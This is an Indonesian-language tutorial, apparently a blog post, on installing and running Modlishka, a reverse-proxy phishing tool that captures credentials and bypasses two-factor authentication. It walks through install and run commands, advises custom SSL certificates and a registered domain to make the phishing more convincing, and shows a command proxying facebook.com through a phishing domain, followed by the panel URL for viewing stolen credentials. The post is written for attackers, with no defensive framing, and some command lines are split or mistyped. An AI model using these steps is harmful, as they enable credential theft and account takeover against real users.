Modlishka - Membuat Phishing Dengan Otentikasi 2FA
Modlishka adalah proxy phishing berbasis go yang membawa kampanye phishing Anda ke level selanjutnya. Fitur utama yang membuatnya berbeda dari alat phishing lainnya, adalah ia mendukung otentikasi 2FA. Sangat mudah untuk mengkonfigurasi dengan fleksibilitas tinggi yang memungkinkan penyerang untuk mengontrol semua lalu lintas dari browser target.
Menginstal Modlishka
Untuk menginstal Modlishka, unduh repo dari github dengan 'go get'eperti yang ditunjukkan di bawah ini
- go get -u
- https://github.com/drk1wi/Modlishka
- cd
- $GOPATH/go/src/github.com/drk1wi/Modlishka/
- make
Cara Menjalanin Modlishka
Untuk menjalankan proxy, buka folder ‘dist’ dan jalankan script
- cd dist\
- ./proxy -h
Kami melihat banyak opsi berbeda. Anda dapat membuat sertifikasi SSL Anda sendiri menggunakan ‘openssl‘ untuk membuat kampanye phishing lebih dapat dipercaya. Juga pertimbangkan untuk mendaftarkan nama domain. Ada juga opsi untuk melewati beberapa langkah keamanan seperti anti-SSRF. Dalam contoh kita, kita akan membuatnya tetap sederhana dan menjalankannya terhadap domain facebook.
Cukup jalankan perintah di bawah ini terhadap target situs untuk melihat proksi beraksi. Opsi phisingDomain perlu diubah agar sesuai dengan kebutuhan Anda. Jika Anda ingin menggunakan ‘loopback.modlishka.io‘ seperti yang ditunjukkan di bawah ini Anda harus mengubah file ‘index.html‘ di dalam folder apache Anda (/ var / www /) agar sesuai dengan template yang Anda butuhkan.
- ./proxy -target https://facebook.com -phishingDomain loopback.modlishka.io -listeningPort 80
Setelah itu Anda harus masuk ke panel kontrol untuk melihat semua kredensial yang Anda dapatkan. Ketikkan ini di browser Anda.
http://loopback.modlishka.io/SayHello2Modlishka/